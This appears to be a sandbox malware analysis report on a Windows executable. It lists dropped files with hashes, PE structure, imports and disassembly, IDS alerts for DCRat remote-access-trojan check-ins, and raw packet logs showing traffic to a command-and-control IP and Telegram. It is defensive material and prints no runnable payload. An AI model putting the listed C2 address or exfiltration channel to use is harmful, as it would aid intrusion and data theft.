                                                                                            Preview:tQqGyJcs052XcJgIH1LXY9SQqiI6t2B4uOuxJJWD8CazQRkv0CuaOWgu8aaQAf9838nNYs97fIYVjc9Y7WFrHlpYsAzstGCdDc5SoXXICw5F8KLfaCTnaR0SSOeX3ROZG5RHhrtj97oUpjahzURrwYCwlm9Z29Ovif9C3E7tStocmfmsy7ii9hms2ff4sTrAs2vKkXovWiYDtkJFAQl5bqwB3QKXiDA9CotttcHbSwMbIi8SVa4brviCGuQUMQNShYBF0ZVhIKmodU2US2CIJjRQFrn9LxOBj34uh2c6EWShJ4iv16BUOFJ7GvAIwVWU5kFkaIxZaFDwQtHLI1IPw3xet6nv2TJtA7miz8VsIm4IBWrXoyA4NGiCxk0eeBgG5TwSHjWKfZGJ8ocWPQHESPg3ZjuOH1OHGyMrjYPFc0ZxAZDIIdOO4cxqx33hyHCoL9DKbuw0AClczs2AflGom9NnAf3qerQUyumBV3rXqYN20V0FA3CMBYBMvZK60GWTvQoFG1om4t7OvVwpoyqlpETZtZP5tugkB4Gjqv8JOZSSaxaaneRCavnr7OVqlt3JMXM1OM93zgWQvB969ySOdeJQQZmbZShffIFDkiMafXM3YX56PZqxbpprN6lykhdh91un55Wbm1sFSQ22eqMAluE0cX0n6X084o3hnSAUDOKj6jZ6EtU4Vd6Pw4KhEsfOBuLoWUPLp16Wje3284jMC5mbsoutHdPVt6hMYvkteJPdgjpRARjKISLFHu5rjfELmknn7reMT0s3qJ4I9dt03ENaubEoz2K8FD065CUSwX0SkRZ80wsGwNSiXM2fn0WbpuynS8M7IaDgN50cCGyCJDL1vRitJyp6AZm0dwp1kv7WKvVcVadgCURmi72BZdxTvHgySA9Pb6cYFzq9

                                                                                            C:\Windows\TAPI\bc31d5a79a9161

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:ASCII text, with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):122
                                                                                            Entropy (8bit):5.498080219517708
                                                                                            Encrypted:false
                                                                                            SSDEEP:3:3VNzZQwoO8Fa4jYH6dP99XfWQjCy1ZDFwnN3DWxCuVxn:3VGTBYHgupyb5wR2FVxn
                                                                                            MD5:A64C69258FB9EAF7C36363A2EAC83416
                                                                                            SHA1:70D608D48FF5A6444E483602240E820236A4BC6A
                                                                                            SHA-256:B6EC695C8E5062F67A7E2A6B340E0731553B0883AADF613925CAAA996C67B8B2
                                                                                            SHA-512:E9C1469F827B0FFB8F115A07608AB4C0C985856DDF469D7EAAFF03E437A960B63184F3F59FBAA498EF511D2D274E4012939C1107AE255D5004ACE177007A03FA
                                                                                            Malicious:false
                                                                                            Preview:2Aa0OKhP8rEsKBaDr9kXAlU0DyxiYJxfcntGn23EEkd7kx1vSYE7lgGRqjxZX80z3jPgRTazGgTaHXPP6CQ9Ez36hcaDEdrFtoDBhVd88P1FMqJTTicUr1uEpT

                                                                                            C:\Windows\TAPI\lmXqPxTfNHomnnafzTOKZnFns.exe

                                                                                            Download File
                                                                                            Process:C:\ProgramData\ssh\System.exe
                                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                            Category:dropped
                                                                                            Size (bytes):1870848
                                                                                            Entropy (8bit):7.42964549457949
                                                                                            Encrypted:false
                                                                                            SSDEEP:49152:2Lx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xf:2+NdmphJ3TWOsfNvNN2myb
                                                                                            MD5:9E0F8EFD67ACC61E4CB3B213B22E21DD
                                                                                            SHA1:7A688B1DF27A1FFA8C6AFB8303DE96B2E09EF802
                                                                                            SHA-256:B3DD5C3207C91F7B1EEC4405A632B23EEB6691A5ED1733FC3C1DC0A9A5783CB6
                                                                                            SHA-512:8D362BC73ADC3B284F0408D94E04D16A96588B121ECCC8674E5F50ECEA3086EA81511D27706536BB22B741A4E9C030AC90A021BE5AF2FDC419603FA45D04E805
                                                                                            Malicious:true
                                                                                            Antivirus:
                                                                                            • Antivirus: ReversingLabs, Detection: 81%
                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.................R...6......Np... ........@.. ....................................@..................................p..K.................................................................................... ............... ..H............text...TP... ...R.................. ..`.sdata.../.......0...V..............@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                            Static File Info

                                                                                            General

                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                            Entropy (8bit):7.374785899002249
                                                                                            TrID:
                                                                                            • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                            • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                            • DOS Executable Generic (2002/1) 0.01%
                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                            File name:6uPVRnocVS.exe
                                                                                            File size:2'180'702 bytes
                                                                                            MD5:7a193e404a6285a41aba3019479d1749
                                                                                            SHA1:e977d421b247ace0c630d118f05938460664c3b8
                                                                                            SHA256:661b2c9879d7ae68512f820689f2198fdc2d71288ed0a6e747a0ae3f4a27f176
                                                                                            SHA512:a93f289943e29c2a34dde3c7e12ce22641afa868b11c541120b48610f22447fe8fd1b8e64436886ac73facaefc3c82dd658129e49ab65917bfd27fd10278cd1c
                                                                                            SSDEEP:49152:abA30qELx3+NdmphJ3TWOodBNw8vNRf1Im/aN0mX3xfz:abdZ+NdmphJ3TWOsfNvNN2mybJ
                                                                                            TLSH:91A5BE027E418911F0191233C2FF554847B9AC512AA6E32FBDB9376E69613E37D0DACB
                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b`..&...&...&.....h.+.....j.......k.>.....^.$...._..0...._..5...._....../y..,.../y..#...&...*...._......._..'...._f.'...._..'..

                                                                                            File Icon

                                                                                            Icon Hash:963b2d2d3b2b863b

                                                                                            Static PE Info

                                                                                            General

                                                                                            Entrypoint:0x41ec40
                                                                                            Entrypoint Section:.text
                                                                                            Digitally signed:false
                                                                                            Imagebase:0x400000
                                                                                            Subsystem:windows gui
                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                            Time Stamp:0x5FC684D7 [Tue Dec 1 18:00:55 2020 UTC]
                                                                                            TLS Callbacks:
                                                                                            CLR (.Net) Version:
                                                                                            OS Version Major:5
                                                                                            OS Version Minor:1
                                                                                            File Version Major:5
                                                                                            File Version Minor:1
                                                                                            Subsystem Version Major:5
                                                                                            Subsystem Version Minor:1
                                                                                            Import Hash:fcf1390e9ce472c7270447fc5c61a0c1

                                                                                            Entrypoint Preview

                                                                                            Instruction
                                                                                            call 00007FFA3CD34EA9h
                                                                                            jmp 00007FFA3CD348BDh
                                                                                            cmp ecx, dword ptr [0043E668h]
                                                                                            jne 00007FFA3CD34A35h
                                                                                            ret
                                                                                            jmp 00007FFA3CD3502Eh
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            push esi
                                                                                            push dword ptr [ebp+08h]
                                                                                            mov esi, ecx
                                                                                            call 00007FFA3CD277C7h
                                                                                            mov dword ptr [esi], 00435580h
                                                                                            mov eax, esi
                                                                                            pop esi
                                                                                            pop ebp
                                                                                            retn 0004h
                                                                                            and dword ptr [ecx+04h], 00000000h
                                                                                            mov eax, ecx
                                                                                            and dword ptr [ecx+08h], 00000000h
                                                                                            mov dword ptr [ecx+04h], 00435588h
                                                                                            mov dword ptr [ecx], 00435580h
                                                                                            ret
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            lea eax, dword ptr [ecx+04h]
                                                                                            mov dword ptr [ecx], 00435568h
                                                                                            push eax
                                                                                            call 00007FFA3CD37BCDh
                                                                                            pop ecx
                                                                                            ret
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007FFA3CD2775Eh
                                                                                            push 0043B704h
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007FFA3CD372E2h
                                                                                            int3
                                                                                            push ebp
                                                                                            mov ebp, esp
                                                                                            sub esp, 0Ch
                                                                                            lea ecx, dword ptr [ebp-0Ch]
                                                                                            call 00007FFA3CD349D4h
                                                                                            push 0043B91Ch
                                                                                            lea eax, dword ptr [ebp-0Ch]
                                                                                            push eax
                                                                                            call 00007FFA3CD372C5h
                                                                                            int3
                                                                                            jmp 00007FFA3CD39313h
                                                                                            jmp dword ptr [00433260h]
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            int3
                                                                                            push 00421EB0h
                                                                                            push dword ptr fs:[00000000h]

                                                                                            Rich Headers

                                                                                            Programming Language:
                                                                                            • [ C ] VS2008 SP1 build 30729
                                                                                            • [IMP] VS2008 SP1 build 30729
                                                                                            • [C++] VS2015 UPD3.1 build 24215
                                                                                            • [EXP] VS2015 UPD3.1 build 24215
                                                                                            • [RES] VS2015 UPD3 build 24213
                                                                                            • [LNK] VS2015 UPD3.1 build 24215

                                                                                            Data Directories

                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x3c8200x34.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3c8540x3c.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x630000xc368.rsrc
                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000x2268.reloc
                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3aac00x54.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x355080x40.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x330000x260.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x3bdc40x120.rdata
                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                            Sections

                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                            .text0x10000x310ea0x31200c5bf61bbedb6ad471e9dc6266398e965False0.583959526081425data6.708075396341128IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                            .rdata0x330000xa6120xa8007980b588d5b28128a2f3c36cabe2ce98False0.45284598214285715data5.221742709250668IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .data0x3e0000x237280x1000201530c9e56f172adf2473053298d48fFalse0.36767578125data3.7088186669877685IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .didat0x620000x1880x200c5d41d8f254f69e567595ab94266cfdcFalse0.4453125data3.2982538067961342IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x630000xc3680xc40012a9ade67f13cd480395c446598fe865False0.6443319515306123data6.469107959368268IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            .reloc0x700000x22680x2400c7a942b723cb29d9c02f7c611b544b50False0.7681206597222222data6.5548620101740545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                            Resources

                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            PNG0x635b40xb45PNG image data, 93 x 302, 8-bit/color RGB, non-interlacedEnglishUnited States1.0027729636048528
                                                                                            PNG0x640fc0x15a9PNG image data, 186 x 604, 8-bit/color RGB, non-interlacedEnglishUnited States0.9363390441839495
                                                                                            RT_ICON0x656a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.350140712945591
                                                                                            RT_ICON0x667500x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.5452127659574468
                                                                                            RT_ICON0x66bb80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.24107883817427386
                                                                                            RT_ICON0x691600x3eb3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9905301850352003
                                                                                            RT_DIALOG0x6d0140x286dataEnglishUnited States0.5092879256965944
                                                                                            RT_DIALOG0x6d29c0x13adataEnglishUnited States0.60828025477707
                                                                                            RT_DIALOG0x6d3d80xecdataEnglishUnited States0.6991525423728814
                                                                                            RT_DIALOG0x6d4c40x12edataEnglishUnited States0.5927152317880795
                                                                                            RT_DIALOG0x6d5f40x338dataEnglishUnited States0.45145631067961167
                                                                                            RT_DIALOG0x6d92c0x252dataEnglishUnited States0.5757575757575758
                                                                                            RT_STRING0x6db800x1e2dataEnglishUnited States0.3900414937759336
                                                                                            RT_STRING0x6dd640x1ccdataEnglishUnited States0.4282608695652174
                                                                                            RT_STRING0x6df300x1b8dataEnglishUnited States0.45681818181818185
                                                                                            RT_STRING0x6e0e80x146dataEnglishUnited States0.5153374233128835
                                                                                            RT_STRING0x6e2300x446dataEnglishUnited States0.340036563071298
                                                                                            RT_STRING0x6e6780x166dataEnglishUnited States0.49162011173184356
                                                                                            RT_STRING0x6e7e00x152dataEnglishUnited States0.5059171597633136
                                                                                            RT_STRING0x6e9340x10adataEnglishUnited States0.49624060150375937
                                                                                            RT_STRING0x6ea400xbcdataEnglishUnited States0.6329787234042553
                                                                                            RT_STRING0x6eafc0xd6dataEnglishUnited States0.5747663551401869
                                                                                            RT_GROUP_ICON0x6ebd40x3edata0.8225806451612904
                                                                                            RT_MANIFEST0x6ec140x753XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.39786666666666665

                                                                                            Imports

                                                                                            DLLImport
                                                                                            KERNEL32.dllGetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCommandLineA, GetEnvironmentStringsW, FreeEnvironmentStringsW, DecodePointer
                                                                                            gdiplus.dllGdiplusShutdown, GdiplusStartup, GdipCreateHBITMAPFromBitmap, GdipCreateBitmapFromStreamICM, GdipCreateBitmapFromStream, GdipDisposeImage, GdipCloneImage, GdipFree, GdipAlloc

                                                                                            Possible Origin

                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States

                                                                                            Network Behavior

                                                                                            Suricata IDS Alerts

                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2025-01-11T18:07:16.689498+01002034194ET MALWARE DCRAT Activity (GET)1192.168.2.4512885.101.152.1580TCP
                                                                                            2025-01-11T18:07:20.259693+01001810009Joe Security ANOMALY Telegram Send Photo1192.168.2.453641149.154.167.220443TCP
                                                                                            2025-01-11T18:07:52.644367+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M415.101.152.1580192.168.2.453647TCP
                                                                                            2025-01-11T18:09:12.682023+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M415.101.152.1580192.168.2.453928TCP
                                                                                            2025-01-11T18:10:39.213109+01002850862ETPRO MALWARE DCRat Initial Checkin Server Response M415.101.152.1580192.168.2.453943TCP

                                                                                            Network Port Distribution

                                                                                            TCP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Jan 11, 2025 18:07:15.832535028 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:15.837376118 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:15.837450981 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:15.838148117 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:15.842969894 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.386791945 CET5363453192.168.2.41.1.1.1
                                                                                            Jan 11, 2025 18:07:16.391669035 CET53536341.1.1.1192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.391741037 CET5363453192.168.2.41.1.1.1
                                                                                            Jan 11, 2025 18:07:16.396579981 CET53536341.1.1.1192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.689215899 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.689258099 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.689497948 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:16.735327005 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:16.736063004 CET5363680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:16.740247965 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.740951061 CET80536365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.741090059 CET5363680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:16.741200924 CET5363680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:16.745970011 CET80536365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.836549044 CET5363453192.168.2.41.1.1.1
                                                                                            Jan 11, 2025 18:07:16.841629982 CET53536341.1.1.1192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.842087984 CET5363453192.168.2.41.1.1.1
                                                                                            Jan 11, 2025 18:07:16.870018005 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:16.874890089 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:16.963927031 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.021924019 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:17.099844933 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.102787018 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:17.107839108 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.107877016 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.107904911 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.351427078 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.394515038 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:17.477341890 CET80536365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.481484890 CET5363680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:17.486433983 CET80536365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.486493111 CET80536365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.882611990 CET80536365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:17.925699949 CET5363680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:18.011460066 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.011492014 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.011655092 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.080461979 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.080490112 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.562943935 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.563024044 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.566971064 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.566979885 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.567183018 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.613173962 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.737317085 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.783324957 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.867013931 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.867090940 CET4435363934.117.59.81192.168.2.4
                                                                                            Jan 11, 2025 18:07:18.867161036 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:18.870448112 CET53639443192.168.2.434.117.59.81
                                                                                            Jan 11, 2025 18:07:19.339823008 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:19.339919090 CET5363680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:19.345170975 CET80512885.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:19.345324993 CET80536365.101.152.15192.168.2.4
                                                                                            Jan 11, 2025 18:07:19.345381975 CET5128880192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:19.345396996 CET5363680192.168.2.45.101.152.15
                                                                                            Jan 11, 2025 18:07:19.350138903 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:19.350228071 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:19.350433111 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:19.350852013 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:19.350887060 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:19.968159914 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:19.969511986 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:19.970238924 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:19.970267057 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:19.970622063 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:19.972203016 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.019323111 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.259625912 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.261061907 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.261147976 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.261864901 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.261904001 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262068033 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262300014 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262440920 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262470961 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262499094 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262521982 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262522936 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262545109 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262569904 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262593985 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262646914 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262670994 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262697935 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262722015 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262729883 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262748003 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262790918 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262805939 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262839079 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262857914 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262875080 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262888908 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.262914896 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262949944 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.262998104 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263024092 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263030052 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263058901 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263073921 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263084888 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263103008 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263179064 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263187885 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263223886 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263252974 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263290882 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263343096 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263375998 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263380051 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263411999 CET53641443192.168.2.4149.154.167.220
                                                                                            Jan 11, 2025 18:07:20.263427019 CET44353641149.154.167.220192.168.2.4
                                                                                            Jan 11, 2025 18:07:20.263448954 CET53641443192.168.2.4149.154.167.220
